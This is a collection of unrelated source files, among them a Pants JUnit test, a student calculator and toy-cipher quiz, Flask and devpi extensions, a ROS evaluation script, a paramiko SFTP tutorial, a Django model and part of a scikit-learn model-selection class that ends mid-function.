                        "JUNIT_TESTS_VAR_WITH_VALUE=junit_tests_var_with_value",
                        "JUNIT_TESTS_OVERRIDE_WITH_VALUE_VAR=junit_tests_override_with_value_var_override",
                    ],
                )
                """
            ),
            "ExtraEnvVarsTest.java": dedent(
                """\
                package org.pantsbuild.example;
                import junit.framework.TestCase;
                public class ExtraEnvVarsTest extends TestCase {
                    public void testArgs() throws Exception {
                        assertEquals(System.getenv("ARG_WITH_VALUE_VAR"), "arg_with_value_var");
                        assertEquals(System.getenv("ARG_WITHOUT_VALUE_VAR"), "arg_without_value_var");
                        assertEquals(System.getenv("JUNIT_TESTS_VAR_WITH_VALUE"), "junit_tests_var_with_value");
                        assertEquals(System.getenv("JUNIT_TESTS_VAR_WITHOUT_VALUE"), "junit_tests_var_without_value");
                        assertEquals(System.getenv("JUNIT_TESTS_OVERRIDE_WITH_VALUE_VAR"), "junit_tests_override_with_value_var_override");
                    }
                }
                """
            ),
        }
    )
    result = run_junit_test(
        rule_runner,
        "example-test",
        "ExtraEnvVarsTest.java",
        extra_args=[
            '--test-extra-env-vars=["ARG_WITH_VALUE_VAR=arg_with_value_var", "ARG_WITHOUT_VALUE_VAR", "JUNIT_TESTS_OVERRIDE_WITH_VALUE_VAR"]'
        ],
        env={
            "ARG_WITHOUT_VALUE_VAR": "arg_without_value_var",
            "JUNIT_TESTS_VAR_WITHOUT_VALUE": "junit_tests_var_without_value",
            "JUNIT_TESTS_OVERRIDE_WITH_VALUE_VAR": "junit_tests_override_with_value_var",
        },
    )
    assert result.exit_code == 0
|
#################################################################################
# Name : Matthew Nummy
# Date : 11/25/2020
# Assignment : Quiz 2 - Part 2
# Pledge : I pledge my Honor that I have abided by the Stevens Honor System
# I understand that I may access the course textbook and course lecture notes but I am not to access any
# other resource. I also pledge that I worked alone on this exam.
#################################################################################
def addition(x, y):
    """Return the sum x + y."""
    return x + y

def subtraction(x, y):
    """Return the difference x - y."""
    return x - y

def multiplication(x, y):
    """Return the product x * y."""
    return x * y

def division(x, y):
    """Return x / y.

    NOTE(review): this script targets Python 2 (raw_input/unicode below), so
    integer operands floor-divide here; under Python 3 this is true division.
    """
    return x / y
# Finds and returns the number of vowels in the provided string.
def vowel_finder(string):
    """Return the count of vowels (a/e/i/o/u, either case) in *string*."""
    vowels = set("aeiouAEIOU")
    # sum() over a generator replaces the manual counter loop.
    return sum(1 for ch in string if ch in vowels)
# Creates an array where each index contains a letter from the string. Spaces are removed.
def split_string(string):
    """Return the characters of *string* as a list, with space characters removed."""
    # One comprehension replaces the original build-then-filter double pass.
    return [ch for ch in string if ch != ' ']
# This function creates the string encryption.
def string_encryption(string):
    """Encrypt *string*: each letter becomes its frequency rank (1-26) and each
    word is followed by a letter encoding that word's length (A=1 ... Z=26,
    'Z'+letter for 27-52). Returns the string "Error" for words longer than 52
    characters.
    """
    letter_array = split_string(string)
    word_array = string.split(' ')
    # One slot per word for the word-length marker letter.
    space_array = [0] * len(word_array)
    # letter_dict assigns each letter in the alphabet a numerical key 1-26. The keys are assigned based on the
    # frequency with which the letters appear in the english language.
    letter_dict = dict({1: ['E', 'e'],
                        2: ['T', 't'],
                        3: ['A', 'a'],
                        4: ['O', 'o'],
                        5: ['I', 'i'],
                        6: ['N', 'n'],
                        7: ['S', 's'],
                        8: ['H', 'h'],
                        9: ['R', 'r'],
                        10: ['D', 'd'],
                        11: ['L', 'l'],
                        12: ['C', 'c'],
                        13: ['U', 'u'],
                        14: ['M', 'm'],
                        15: ['W', 'w'],
                        16: ['F', 'f'],
                        17: ['G', 'g'],
                        18: ['Y', 'y'],
                        19: ['P', 'p'],
                        20: ['B', 'b'],
                        21: ['V', 'v'],
                        22: ['K', 'k'],
                        23: ['J', 'j'],
                        24: ['X', 'x'],
                        25: ['Q', 'q'],
                        26: ['Z', 'z']})
    # This dictionary will be used to represent the length of the preceding word as [a] letter(s). Max word length of
    # 52 characters (represented as ZZ).
    spaces_dict = dict({1: 'A',
                        2: 'B',
                        3: 'C',
                        4: 'D',
                        5: 'E',
                        6: 'F',
                        7: 'G',
                        8: 'H',
                        9: 'I',
                        10: 'J',
                        11: 'K',
                        12: 'L',
                        13: 'M',
                        14: 'N',
                        15: 'O',
                        16: 'P',
                        17: 'Q',
                        18: 'R',
                        19: 'S',
                        20: 'T',
                        21: 'U',
                        22: 'V',
                        23: 'W',
                        24: 'X',
                        25: 'Y',
                        26: 'Z'})
    # Replaces letters in letter_array with corresponding numerical keys.
    for i in range(len(letter_array)):
        for j in range(1, 27):
            if letter_array[i] in letter_dict[j]:
                letter_array[i] = j
    # Creates array of letters that represent word lengths.
    for i in range(len(word_array)):
        if len(word_array[i]) < 27:
            space_array[i] = spaces_dict[len(word_array[i])]
        elif 26 < len(word_array[i]) < 53:
            # 27-52 is encoded as 'Z' (26) plus the letter for the remainder.
            remainder = len(word_array[i]) - 26
            space_array[i] = 'Z' + spaces_dict[remainder]
        else:
            return "Error"
    return string_builder(word_array, letter_array, space_array)
# This function builds the string that is printed to the console.
def string_builder(word_array, letter_array, space_array):
    """Assemble the final encrypted string.

    word_array: the original words; letter_array: per-letter numeric codes;
    space_array: one word-length marker letter per word, inserted after each
    word's codes.
    """
    encrypted_string_array = [0] * len(letter_array)
    encrypted_string = ""
    pop_list = []
    word_lengths = []
    # Fills array with encrypted letters
    for i in range(len(letter_array)):
        encrypted_string_array[i] = letter_array[i]
    # Places "word-length letters" after each word.
    for i in range(len(word_array)):
        # Offset = letters of previous words + markers already inserted (i) + this word's length.
        gap_between_spaces = sum(word_lengths) + i + len(word_array[i])
        encrypted_string_array.insert(gap_between_spaces, space_array[i])
        word_lengths.append(len(word_array[i]))
    # Removes extra 0s from encrypted_string_array and turns the array into a string.
    for i in range(len(encrypted_string_array)):
        if encrypted_string_array[i] == 0:
            pop_list.append(i)
        else:
            encrypted_string += str(encrypted_string_array[i])
    # Pop in reverse so earlier removals don't shift the remaining indices.
    for i in reversed(pop_list):
        encrypted_string_array.pop(i)
    return encrypted_string
def _read_operands():
    """Prompt for and return the two integer operands for an arithmetic op."""
    # raw_input instead of input: Python 2's input() eval()s what is typed.
    x = int(raw_input("Enter your first operand: "))
    y = int(raw_input("Enter your second operand: "))
    return x, y

def main():
    """Text-menu driver: arithmetic (option 1) or string operations (option 2).

    Written for Python 2 (raw_input/unicode). Returns 0 on invalid input,
    otherwise falls off the end (None) like the original flow.
    """
    # Parsing user input.
    print("For Mathematical Functions, Please Enter the Number 1")
    print("For String Operations, Please Enter the Number 2")
    main_menu_choice = raw_input("Your choice: ")
    if not unicode(main_menu_choice).isnumeric():
        print("Invalid input. 1 or 2 expected.")
        return 0
    main_menu_choice = int(main_menu_choice)
    if main_menu_choice == 1:
        print("For Addition, Please Enter the Number 1")
        print("For Subtraction, Please Enter the Number 2")
        print("For Multiplication, Please Enter the Number 3")
        print("For Division, Please Enter the Number 4")
        math_func_choice = raw_input("Your choice: ")
        if not unicode(math_func_choice).isnumeric():
            print("Invalid input. 1, 2, 3 or 4 expected.")
            return 0
        math_func_choice = int(math_func_choice)
        if math_func_choice == 1:
            x, y = _read_operands()
            result = addition(x, y)
            print("The sum of " + str(x) + " and " + str(y) + " is " + str(result) + ".")
        elif math_func_choice == 2:
            x, y = _read_operands()
            result = subtraction(x, y)
            print("The difference between " + str(x) + " and " + str(y) + " is " + str(result) + ".")
        elif math_func_choice == 3:
            x, y = _read_operands()
            result = multiplication(x, y)
            print("The product of " + str(x) + " and " + str(y) + " is " + str(result) + ".")
        elif math_func_choice == 4:
            x, y = _read_operands()
            result = division(x, y)
            print("The quotient of " + str(x) + " divided by " + str(y) + " is " + str(result) + ".")
        else:
            print("Invalid input. 1, 2, 3 or 4 expected.")
    elif main_menu_choice == 2:
        print("To Determine the Number of Vowels in a String; Enter the Number 1")
        print("To Encrypt a String; Enter the Number 2")
        string_operation_choice = raw_input("Your choice: ")
        string = raw_input("Enter your string: ")
        if not unicode(string_operation_choice).isnumeric():
            print("Invalid input (string operation choice). 1 or 2 expected. 1")
            return 0
        string_operation_choice = int(string_operation_choice)
        # `ch` instead of `chr`: the original shadowed the builtin chr().
        if string != '' and all(ch.isalpha() or ch.isspace() for ch in string):
            if string_operation_choice == 1:
                print("There are " + str(vowel_finder(string)) + " vowels in the word(s) '" + string + "'.")
            elif string_operation_choice == 2:
                # Encrypt once; the original called string_encryption twice.
                result = string_encryption(string)
                if result == 'Error':
                    print("Error: String contains a word longer than 52 characters.")
                    return 0
                print("Your encrypted string is: " + result)
            else:
                print("Invalid input (string operation choice). 1 or 2 expected. 2")
        else:
            print("Invalid input (string). Only letters and spaces allowed.")
    else:
        print("Invalid input. 1 or 2 expected.")

main()
|
# -*- coding: utf-8 -*-
#
# This file is part of Flask-AppExts
# Copyright (C) 2015 CERN.
#
# Flask-AppExts is free software; you can redistribute it and/or
# modify it under the terms of the Revised BSD License; see LICENSE
# file for more details.
"""Flask-Collect extension."""
from __future__ import absolute_import, unicode_literals, print_function
import click
from flask_collect import Collect
from flask_cli import with_appcontext
from flask import current_app
@click.command()
@click.option('-v', '--verbose', default=False, is_flag=True)
@with_appcontext
def collect(verbose=False):
    """Collect static files."""
    # Delegates to the Flask-Collect extension registered on the current app.
    current_app.extensions['collect'].collect(verbose=verbose)
def setup_app(app):
    """Configure Flask-Collect on *app* and register the `collect` CLI command."""
    def filter_(items):
        """Filter application blueprints."""
        # Sort blueprints to match the order they were registered in the registry.
        order = [blueprint.name for blueprint in
                 app.extensions['registry']['blueprints']]
        def _key(item):
            # Blueprints not in the registry sort first (-1).
            if item.name in order:
                return order.index(item.name)
            return -1
        return sorted(items, key=_key)
    app.config.setdefault('COLLECT_FILTER', filter_)
    app.config.setdefault('COLLECT_STATIC_ROOT', app.static_folder)
    ext = Collect(app)
    # unsetting the static_folder so it's not picked up by collect.
    class FakeApp(object):
        # Stand-in app object exposing no static folder of its own.
        name = "fakeapp"
        has_static_folder = False
        static_folder = None
    ext.app = FakeApp()
    app.cli.add_command(collect)
|
from collections import defaultdict
from devpi_server.log import threadlog as log
from devpi_server.readonly import get_mutable_deepcopy
from devpi_web.whoosh_index import project_name
from elasticsearch import Elasticsearch
from elasticsearch.helpers import streaming_bulk
class Index:
    """Thin wrapper around an Elasticsearch index of devpi project documents."""

    def __init__(self):
        self.index = 'devpi'
        self.es = Elasticsearch()

    def delete_index(self):
        """Drop the whole index; a missing index is not an error."""
        self.es.indices.delete(index=self.index, ignore_unavailable=True)

    def _update_projects(self, projects):
        """Yield one streaming_bulk action dict per project in *projects*."""
        main_keys = [
            'path', 'name', 'user', 'index', 'classifiers', 'keywords',
            'version', 'doc_version', 'type',
            'text_path', 'text_title', 'text']
        for i, project in enumerate(projects, 1):
            data = {
                x: get_mutable_deepcopy(project[x])
                for x in main_keys if x in project}
            data['path'] = u"/{user}/{index}/{name}".format(**data)
            data['type'] = "project"
            # Index both the raw and the normalized project name for search.
            data['text'] = "%s %s" % (data['name'], project_name(data['name']))
            yield dict(
                _index=self.index,
                _type=data['type'],
                _id=data['path'],
                _source=data)

    def update_projects(self, projects, clear=False):
        """Bulk-index *projects*, logging progress every 1000 documents.

        NOTE(review): *clear* is currently ignored — confirm intent.
        """
        results = streaming_bulk(client=self.es, actions=self._update_projects(projects))
        for i, result in enumerate(results):
            if i % 1000 == 0:
                log.info("Indexed %s", i)

    def query_projects(self, querystring, page=1):
        """Return one page (10 hits) of project docs plus pagination info.

        NOTE(review): *querystring* is ignored; a match_all query is issued.
        """
        items = []
        result_info = dict()
        result = {"items": items, "info": result_info}
        res = self.es.search(
            index=self.index,
            body={"query": {"match_all": {}}},
            from_=(page - 1) * 10)
        hits = res.pop('hits')
        raw_items = hits.pop('hits')
        # Leftover debug prints replaced by logging so stdout stays clean.
        log.debug("es response meta: %s", res)
        log.debug("es hits meta: %s", hits)
        result_info['collapsed_counts'] = defaultdict(int)
        result_info['pagecount'] = hits['total'] // 10
        if result_info['pagecount'] > 999:
            result_info['pagecount'] = 999
        result_info['pagenum'] = page
        result_info['total'] = hits['total']
        for item in raw_items:
            info = dict(
                data=dict(item['_source']),
                sub_hits=())
            items.append(info)
        return result

    def get_query_parser_html_help(self):
        """No extra query-syntax help to display for the ES backend."""
        return []
|
../../process/base/common_base.py |
#!/usr/bin/env python
# Batch-run the dream_babbling classifier_eval launch file over every archive
# folder found under sys.argv[1], once per (method, modality) configuration.
import os
import sys
import subprocess as sp

# Feature-vector dimensionality for each descriptor modality.
dimensions = {
    "merged": 63,
    "colorNormalHist": 45,
    "colorHSV": 3,
    "colorRGB": 3,
    "colorH": 5,
    "colorS": 5,
    "colorV": 5,
    "colorHist": 30,
    "normal": 3,
    "normalX": 5,
    "normalY": 5,
    "normalZ": 5,
    "normalHist": 15,
    "normalHistLarge": 27,
    "fpfh": 33,
    "colorHSVNormal": 6,
    "colorRGBNormal": 6,
    "colorLab": 6,
    "colorLabHist": 15,
    "colorLabNormalHist": 30,
    "merge": 0,
}

def run_eval(archive_root, method, modality, output_file):
    """roslaunch classifier_eval once per archive folder under *archive_root*.

    The dimension argument is looked up from `dimensions` by modality.
    """
    for folder in os.listdir(archive_root):
        print(folder)
        sp.call(["roslaunch", "dream_babbling", "classifier_eval.launch",
                 "archive_folder:=" + archive_root + folder,
                 "method:=" + method,
                 "modality:=" + modality,
                 "dimension:=" + str(dimensions[modality]),
                 "number_of_iteration:=100",
                 "output_file:=" + output_file])

# Same four runs as before, deduplicated from four copy-pasted loops.
run_eval(sys.argv[1], "gmm", "colorLabHist", "classifier_eval_colorLabHist.yml")
run_eval(sys.argv[1], "gmm", "normalHistLarge", "classifier_eval_normalHistLarge.yml")
run_eval(sys.argv[1], "mcs", "merge", "classifier_eval.yml")
run_eval(sys.argv[1], "gmm", "fpfh", "classifier_eval_fpfh.yml")
class CoreException(Exception):
    """Base class for all tool errors so the CLI can catch them uniformly."""

class SubmoduleFindingError(CoreException):
    """Raised when the expected git submodule cannot be located."""

class DirtyRepoError(CoreException):
    """Raised when the working tree has uncommitted changes."""

class MasterBranchError(CoreException):
    """Raised when the repository is not on the expected branch."""

class PushBranchError(CoreException):
    """Raised when the branch to push cannot be found."""

class RemoteURLError(CoreException):
    """Raised when a git remote's URL is not in the expected form."""

class PuenteVersionError(CoreException):
    """Raised when the next puente version cannot be determined."""
|
# At start-up, a Thread does some basic initialization and then calls its run()
# method, which calls the target function passed to the constructor. To create
# a subclass of Thread, override run() to do whatever is necessary.
import threading
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s')
class MyThread(threading.Thread):
    """Thread subclass: per-thread work lives in run(), invoked after start()."""

    def run(self):
        # Executed in the new thread; the thread name appears via the log format.
        logging.debug('running')

# Spawn five threads; each logs once and exits.
for i in range(5):
    t = MyThread()
    t.start()
|
# The paramiko module supports encrypted, authenticated connections to remote
# servers and can upload/download files or run commands over SSH.
# Install: pip3.6 install paramiko

# --- Remote file upload/download over SFTP ---
import paramiko  # SSH/SFTP client library

# Password-authenticated variant (kept for reference):
# trans = paramiko.Transport(("10.1.1.12",22)) # open a transport to 10.1.1.12:22
#
# trans.connect(username="root",password="123456") # authenticate with username/password
#
# sftp = paramiko.SFTPClient.from_transport(trans) # switch the transport to SFTP mode
#
# sftp.get("/etc/fstab","/tmp/fstab") # download remote /etc/fstab to local /tmp/fstab (a full target file name is required, not just /tmp)
# sftp.put("/etc/inittab","/tmp/inittab") # upload works the same way; name the target file
#
# trans.close()

# --- Key-based (passwordless) upload/download ---
# Requires key login to be set up beforehand (ssh-keygen, ssh-copy-id xx).
trans = paramiko.Transport(("10.1.1.12",22)) # open a transport to 10.1.1.12:22
private_key = paramiko.RSAKey.from_private_key_file("/root/.ssh/id_rsa") # path to the local private key
trans.connect(username="root",pkey=private_key) # authenticate with the key set up via ssh-keygen/ssh-copy-id
sftp = paramiko.SFTPClient.from_transport(trans)
sftp.get("/etc/fstab","/tmp/fstab2")
sftp.put("/etc/inittab","/tmp/inittab2")
trans.close()
|
#coding=utf8
from django.db import models
# Create your models here.
class Accounts(models.Model):
    """User account record.

    NOTE(review): passwd appears to hold a password — confirm it is hashed
    before storage and never saved as plaintext.
    """
    usr_name = models.CharField(max_length = 64)   # login name
    passwd = models.CharField(max_length = 256)    # password (see class note)
    email = models.EmailField()
    phone = models.CharField(max_length = 32)
    qq = models.CharField(max_length = 64)         # QQ messenger id
|
# -*- coding: utf-8 -*-
#
# Copyright 2016 Ramil Nugmanov <stsouko@live.ru>
# This file is part of MODtools.
#
# MODtools is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
import tempfile
import shutil
import numpy as np
import operator
import pandas as pd
from collections import defaultdict
from itertools import product
from copy import deepcopy
from math import sqrt, ceil
from sklearn.externals.joblib import Parallel, delayed
from sklearn.utils import shuffle
from sklearn.cross_validation import KFold
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error, r2_score, cohen_kappa_score, accuracy_score
class Score(dict):
    """Dict of scorer-name -> value, comparable element-wise against another mapping.

    A comparison holds only when it holds for every key present in this Score.
    """

    def __init__(self, *args, **kwargs):
        dict.__init__(self, *args, **kwargs)

    def __comparer(self, other, op):
        # True only when op(value, other[key]) holds for every entry here.
        for key, value in self.items():
            if not op(value, other[key]):
                return False
        return True

    def __lt__(self, other):
        return self.__comparer(other, operator.lt)

    def __le__(self, other):
        return self.__comparer(other, operator.le)
def _kfold(est, x, y, train, test, svmparams, normalize, box):
    """Fit one cross-validation fold and return the model plus fold predictions.

    est: estimator class; x, y: full descriptor/property frames; train/test:
    positional index arrays for this fold; svmparams: estimator kwargs;
    normalize: MinMax-scale descriptors (scaler fit on train only); box:
    descriptor columns used for the bounding-box applicability domain.
    """
    x_train, y_train = x.iloc[train], y.iloc[train]
    x_test, y_test = x.iloc[test], y.iloc[test]
    # Bounding box of the training descriptors = applicability-domain limits.
    x_min = x_train.min().loc[box]
    x_max = x_train.max().loc[box]
    y_min = y_train.min()
    y_max = y_train.max()
    # True where every boxed descriptor of a test row lies inside the box.
    x_ad = ((x_test.loc[:, box] - x_min).min(axis=1) >= 0) & ((x_max - x_test.loc[:, box]).min(axis=1) >= 0)
    if normalize:
        normal = MinMaxScaler()
        # Fit on train only to avoid leaking test statistics.
        x_train = pd.DataFrame(normal.fit_transform(x_train), columns=x_train.columns)
        x_test = pd.DataFrame(normal.transform(x_test), columns=x_train.columns)
    else:
        normal = None
    model = est(**svmparams)
    model.fit(x_train, y_train)
    y_pred = pd.Series(model.predict(x_test), index=y_test.index)
    # A prediction is in-domain when it falls inside the training target range.
    y_ad = (y_pred >= y_min) & (y_pred <= y_max)
    output = dict(model=model, normal=normal, x_min=x_min, x_max=x_max, y_min=y_min, y_max=y_max,
                  y_test=y_test, y_pred=y_pred, x_ad=x_ad, y_ad=y_ad)
    if hasattr(model, 'predict_proba'):
        output['y_prob'] = pd.DataFrame(model.predict_proba(x_test), index=y_test.index, columns=model.classes_)
    return output
def _rmse(y_test, y_pred):
    """Root-mean-squared error between observed and predicted values."""
    mse = mean_squared_error(y_test, y_pred)
    return sqrt(mse)
def _balance_acc(y_test, y_pred):
    """Fraction of correctly predicted samples.

    NOTE(review): despite the name, this is plain accuracy_score
    (normalize=True), not a class-balanced accuracy — confirm intent.
    """
    return accuracy_score(y_test, y_pred, normalize=True)
def _iap(y_test, y_prob):
    """Per-class probability-dominance score, averaged over structure groups.

    For each structure and class, counts how often the predicted probability
    of that class is higher for a true member than for a non-member, and
    returns a Score mapping class -> mean dominance ratio.
    """
    res = defaultdict(list)
    for sid, s_prob in y_prob.groupby(level='structure'):
        s_test = y_test.xs(sid, level='structure', drop_level=False)
        for col in s_prob.columns:
            in_class = s_test.loc[s_test == col].index
            out_class = s_test.loc[s_test != col].index
            # Pairs where the in-class sample outranks the out-of-class one.
            in_class_dominance = sum(s_prob.loc[i][col] > s_prob.loc[o][col] for i, o in product(in_class, out_class))
            possible_combo = len(in_class) * len(out_class)
            # 0 when a class has no in/out pairs for this structure.
            res[col].append(in_class_dominance / possible_combo if possible_combo else 0)
    res = Score({x: sum(y) / len(y) for x, y in res.items()})
    return res
class BaseModel(object):
    """Cross-validated model selection wrapper.

    Generates descriptors for the given structures, grid-searches the
    estimator's fit parameters with repeated k-fold cross-validation,
    keeps the best-scoring model ensemble and exposes prediction with
    applicability-domain flags.
    Subclasses are expected to provide `estimator`, `fitparams` and
    `prepareparams` (referenced but not defined here).
    """

    def __init__(self, descriptorgen, structures, workpath='.', nfold=5, repetitions=1, rep_boost=100, dispcoef=0,
                 fit='rmse', scorers=('rmse', 'r2'), normalize=False, n_jobs=2, **kwargs):
        # Registry of available scorers: name -> (callable, uses_probabilities).
        _scorers = dict(rmse=(_rmse, False), r2=(r2_score, False),
                        kappa=(cohen_kappa_score, False), ba=(_balance_acc, False), iap=(_iap, True))
        self.__model = {}
        self.__descriptorgen = descriptorgen
        self.setworkpath(workpath)
        self.__nfold = nfold
        self.__repetitions = repetitions
        # Reduced repetition count used during the (cheaper) grid-search phase.
        self.__rep_boost = ceil(repetitions * (rep_boost % 100) / 100) or repetitions
        self.__n_jobs = n_jobs
        self.__normalize = normalize
        # Weight of the score variance in the combined 'C<scorer>' fitness value.
        self.__dispcoef = dispcoef
        self.__scorers = {x: _scorers[x] for x in scorers if x in _scorers}
        # Combined score used to select the best parameter set (lower is better).
        self.__fitscore = 'C' + (fit if fit in scorers else scorers[0])
        # %-style template reporting each scorer's mean and variance.
        self.__scorereporter = '\n'.join(['{0} +- variance = %({0})s +- %(v{0})s'.format(i) for i in self.__scorers])
        print("Descriptors generation start")
        xy = descriptorgen.get(structures, **kwargs)
        self.__x = xy['X']
        self.__y = xy['Y']
        # Columns used for the bounding-box applicability domain (defaults to all).
        self.__box = xy.get('BOX', xy['X'].columns)
        print("Descriptors generated")
        self.__crossval()
        self.delworkpath()

    def setworkpath(self, workpath):
        """Create a private temp directory under *workpath* for descriptor files."""
        self.__workpath = tempfile.mkdtemp(dir=workpath)
        self.__descriptorgen.setworkpath(self.__workpath)

    def delworkpath(self):
        """Remove the temporary working directory."""
        shutil.rmtree(self.__workpath)

    def getmodelstats(self):
        """Return CV statistics of the selected model: scores, variances, params."""
        stat = {x: self.__model[x] for x in self.__scorers}
        stat.update({'%s_var' % x: self.__model['v%s' % x] for x in self.__scorers})
        stat.update(dict(fitparams=self.__model['params'], repetitions=self.__repetitions,
                         nfolds=self.__nfold, normalize=self.__normalize,
                         dragostolerance=sqrt(self.__y.var())))
        return stat

    def getfitpredictions(self):
        """Return per-repetition CV predictions with x/y domain flags (and probabilities when present)."""
        output = dict(property=self.__y, prediction=self.__model['y_pred'], y_domain=self.__model['y_ad'],
                      domain=self.__model['x_ad'])
        if 'y_prob' in self.__model:
            output['probability'] = self.__model['y_prob']
        return output

    def __splitrange(self, param, dep=0):
        """Recursively split a value list into a nested coarse-to-fine search tree.

        Returns (tree, depth): tree maps each pivot value to the subtree of its
        neighbouring values, so the grid search can refine around a winner.
        """
        tmp = {}
        fdep = dep
        stepindex = list(range(0, len(param), round(len(param)/10) or 1))
        stepindex.insert(0, -1)
        stepindex.append(len(param))
        for i, j, k in zip(stepindex, stepindex[1:], stepindex[2:]):
            # Pivot at j; recurse on its neighbourhood, excluding the pivot itself.
            tmp[param[j]], tmpd = self.__splitrange(param[i+1:j] + param[j+1:k], dep=dep+1)
            if tmpd > fdep:
                fdep = tmpd
        return tmp, fdep

    def __crossval(self):
        """Coarse-to-fine grid search over self.fitparams; stores the winner in self.__model."""
        fitparams = deepcopy(self.fitparams)
        fcount = 0  # total number of parameter sets evaluated
        depindex = []
        maxdep = []
        print('list of fit params:')
        print(pd.DataFrame(list(fitparams)))
        for param in fitparams:
            di = {}
            md = 0
            for i in param:
                if i != 'kernel':
                    # Replace each flat value list by its refinement tree; track depths.
                    param[i], di[i] = self.__splitrange(param[i])
                    if di[i] > md:
                        md = di[i]
            depindex.append(di)
            maxdep.append(md)
        print('========================================\n'
              'Y mean +- variance = %s +- %s\n'
              ' max = %s, min = %s\n'
              '========================================' %
              (self.__y.mean(), sqrt(self.__y.var()), self.__y.max(), self.__y.min()))
        # Lower combined 'C...' score wins; start from +inf sentinels.
        bestmodel = dict(model=None, Cr2=np.inf, Crmse=np.inf, Ckappa=np.inf, Cba=np.inf, Ciap=np.inf)
        for param, md, di in zip(fitparams, maxdep, depindex):
            var_kern_model = bestmodel
            while True:
                var_param_model = bestmodel
                tmp = self.prepareparams(param)
                for i in tmp:
                    fcount += 1
                    print('%d: fit model with params:' % fcount, i)
                    fittedmodel = self.__fit(i, self.__rep_boost)
                    print(self.__scorereporter % fittedmodel)
                    if fittedmodel[self.__fitscore] <= var_param_model[self.__fitscore]:
                        var_param_model = fittedmodel
                if var_param_model[self.__fitscore] <= var_kern_model[self.__fitscore]:
                    # Improved: descend one level of the refinement tree around the winner.
                    var_kern_model = var_param_model
                    tmp = {}
                    for i, j in var_kern_model['params'].items():
                        if i in ('kernel', 'probability'):
                            tmp[i] = j
                        elif di[i] < md and not param[i][j]:
                            tmp[i] = param[i]
                        else:
                            tmp[i] = param[i][j]
                    param = tmp
                else:
                    # No improvement at this refinement level: stop refining.
                    break
            if var_kern_model[self.__fitscore] <= bestmodel[self.__fitscore]:
                bestmodel = var_kern_model
        if self.__repetitions > self.__rep_boost:
            # Re-fit the winning parameters with the full number of repetitions.
            bestmodel = self.__fit(bestmodel['params'], self.__repetitions)
        print('========================================\n' +
              ('SVM params %(params)s\n' + self.__scorereporter) % bestmodel)
        print('========================================\n%s variants checked' % fcount)
        self.__model = bestmodel

    def __fit(self, fitparams, repetitions):
        """Evaluate one parameter set with *repetitions* x nfold cross-validation.

        Returns a dict with the per-fold models, pooled predictions/domains and,
        for each scorer s: mean (s), combined fitness (Cs) and variance (vs).
        """
        models, y_pred, y_prob, y_ad, x_ad = [], [], [], [], []
        fold_scorers = defaultdict(list)
        parallel = Parallel(n_jobs=self.__n_jobs)
        kf = list(KFold(len(self.__y), n_folds=self.__nfold))
        setindexes = np.arange(len(self.__y.index))
        # One _kfold job per (repetition shuffle, fold) pair, run in parallel.
        folds = parallel(delayed(_kfold)(self.estimator, self.__x, self.__y, s[train], s[test],
                                         fitparams, self.__normalize, self.__box)
                         for s in (self.__shuffle(setindexes, i) for i in range(repetitions))
                         for train, test in kf)
        # street magic. split folds to repetitions
        for kfold in zip(*[iter(folds)] * self.__nfold):
            ky_pred, ky_prob, ky_ad, kx_ad = [], [], [], []
            for fold in kfold:
                ky_pred.append(fold.pop('y_pred'))
                ky_ad.append(fold.pop('y_ad'))
                kx_ad.append(fold.pop('x_ad'))
                if 'y_prob' in fold:
                    ky_prob.append(fold.pop('y_prob'))
                fold.pop('y_test')
                models.append(fold)
            # Reassemble the folds into full-length series aligned to y's index.
            ky_pred = pd.concat(ky_pred).loc[self.__y.index]
            ky_ad = pd.concat(ky_ad).loc[self.__y.index]
            kx_ad = pd.concat(kx_ad).loc[self.__y.index]
            if ky_prob:
                ky_prob = pd.concat(ky_prob).loc[self.__y.index].fillna(0)
                y_prob.append(ky_prob)
            for s, (f, p) in self.__scorers.items():
                # Probability-based scorers (p=True) receive class probabilities.
                fold_scorers[s].append(f(self.__y, (ky_prob if p else ky_pred)))
            y_pred.append(ky_pred)
            y_ad.append(ky_ad)
            x_ad.append(kx_ad)
        y_pred = pd.concat(y_pred, axis=1)
        y_ad = pd.concat(y_ad, axis=1)
        x_ad = pd.concat(x_ad, axis=1)
        res = dict(model=models, params=fitparams, y_pred=y_pred, y_ad=y_ad, x_ad=x_ad)
        if y_prob:
            res['y_prob'] = pd.concat(y_prob, axis=1, keys=range(len(y_prob)))
        for s, _v in fold_scorers.items():
            if isinstance(_v[0], Score):
                # Per-class scores: aggregate mean/variance/fitness per class key.
                m, v, c = Score(), Score(), Score()
                tmp = defaultdict(list)
                for _s in _v:
                    for k, val in _s.items():
                        tmp[k].append(val)
                for k, val in tmp.items():
                    m[k] = np.mean(val)
                    v[k] = sqrt(np.var(val))
                    c[k] = -m[k] + self.__dispcoef * v[k]
            else:
                m, v = np.mean(_v), sqrt(np.var(_v))
                # rmse is minimized (positive sign); other scorers are maximized (negated).
                c = (1 if s == 'rmse' else -1) * m + self.__dispcoef * v
            res.update({s: m, 'C%s' % s: c, 'v%s' % s: v})
        return res

    @staticmethod
    def __shuffle(setindexes, seed):
        """ shuffling method for CV. may be smartest.
        """
        # Deterministic shuffle: the repetition number is used as the seed.
        shuffled = shuffle(setindexes, random_state=seed)
        return shuffled

    def predict(self, structures, **kwargs):
        """Predict *structures* with every stored CV fold model.

        Returns a dict with one prediction column per fold model, x/y
        applicability-domain flags, optional probabilities, and the
        descriptor generator's structures pass-through when present.
        """
        res = self.__descriptorgen.get(structures, **kwargs)
        d_x, d_ad, d_s = res['X'], res['AD'], res.get('structures')
        pred, prob, x_ad, y_ad = [], [], [], []
        for i, model in enumerate(self.__model['model']):
            # Apply the fold's fitted normalizer when one exists.
            x_t = pd.DataFrame(model['normal'].transform(d_x), columns=d_x.columns) if model['normal'] else d_x
            y_p = pd.Series(model['model'].predict(x_t), index=d_x.index)
            pred.append(y_p)
            if hasattr(model['model'], 'predict_proba'):
                y_pa = pd.Series(model['model'].predict_proba(x_t), index=d_x.index)
                prob.append(y_pa)
